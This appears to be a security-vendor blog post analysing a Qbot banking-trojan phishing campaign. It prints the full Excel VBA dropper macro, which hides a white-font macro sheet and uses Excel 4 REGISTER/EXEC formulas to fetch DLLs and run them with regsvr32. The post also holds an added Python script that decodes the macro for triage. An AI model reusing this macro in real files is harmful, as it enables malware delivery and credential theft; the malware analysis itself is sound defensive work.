Advanced Qbot Downloader

Posted on 2021-10-19 by Dmitry Melikov

A few days ago, we discovered a wave of phishing emails carrying an attached document. Notably, a considerable number of the samples had zero detections on VirusTotal (VT). Because several of the files went undetected by AV for some time, we decided to focus on this wave and explore it in more detail.

Image 1: Graphical Coercive Lure

The lure image prompts the victim to allow editing and modification of the document.

Image 2: Initial VT Detection

Although results on VT do not exactly mirror what the same anti-virus products would report on a live system, many samples had zero AV detections on VT for several days. This is a dangerous precedent: dozens of samples of the loader for the Qbot banking trojan were this poorly detected.

Image 3: Detection Evolution on VT

Image 4: Malicious sample within InQuest Labs.

InQuest Labs has flagged these files as malicious based on machine learning models and other Deep File Inspection findings.

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"

Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"

Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"

Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function

Image 5: Macro payload.

As the macro above shows, the font colour of the hidden macro sheet is set to white (Font.Color = vbWhite). This is a popular way to hide the payload from the user's eyes.
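Added example (not from the post or from InQuest): a small Python triage helper that replays the macro's straight-line string assignments (`Drezden & Trewasd & "(...)"`, `"J" & "J" & ...`) to recover the XLM formulas it writes into Sheet777, then reports the white-font tell, the alias under which =REGISTER exposes a DLL export, and what =EXEC runs. The embedded MACRO is a constructed excerpt of the code quoted above.

```python
import re
# Constructed excerpt of the dropper macro quoted above, embedded so the script runs offline.
MACRO = r'''
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
'''
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')                            # Name = expr
CELL = re.compile(r'^\s*Sheets\("\w+"\)\.Range\("(\w+)"\)\s*=\s*(.+?)\s*$')  # Range("H9") = expr
TOKEN = re.compile(r'"([^"]*)"|(\w+)')                                        # literal | identifier

def resolve(expr, consts):
    # Fold string literals, known string variables and '&' into one string; None otherwise.
    if TOKEN.sub("", expr).replace("&", "").strip():
        return None
    out = [consts.get(name) if name else lit for lit, name in TOKEN.findall(expr)]
    return None if None in out else "".join(out)

def extract_cells(macro):
    # Replay the straight-line assignments to recover the string written into each cell.
    consts, cells = {}, {}
    for line in macro.splitlines():
        m = CELL.match(line) or ASSIGN.match(line)
        val = resolve(m.group(2), consts) if m else None
        if val is not None:
            (cells if m.re is CELL else consts)[m.group(1)] = val
    return cells

def triage(macro):
    # Defender-facing findings: the white-font tell plus the reconstructed XLM formulas.
    cells = extract_cells(macro)
    findings = ["white font hides the macro-sheet text"] if "vbWhite" in macro else []
    aliases = set()
    for val in cells.values():  # REGISTER's 4th argument is the cell holding the alias name
        if val.upper().startswith("=REGISTER("):
            aliases.add(cells.get(val[10:].split(",")[3].strip()))
    for ref, val in sorted(cells.items()):
        fn = val[1:].split("(")[0] if val.startswith("=") else ""
        if fn.upper() == "EXEC":
            findings.append(f"{ref}: =EXEC runs '{cells.get(val[6:-1].strip(), val)}'")
        elif fn in aliases:
            findings.append(f"{ref}: calls the REGISTERed export under alias '{fn}'")
    return findings
```

Run `triage(MACRO)` on the excerpt to see the recovered =REGISTER alias (Byukilos) and the regsvr32 command that =EXEC launches; the resolver deliberately returns None for anything it cannot fold statically, so unknown expressions are skipped rather than guessed.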

Image 6: Download addresses

The file also contains the download addresses from which the Qbot payload is retrieved. Qbot, also known as QuackBot, is the most popular banking bot today; its malicious functionality includes stealing account credentials in order to steal money. Below we have provided indicators of infection that we also collected within InQuest Labs.

IOCs
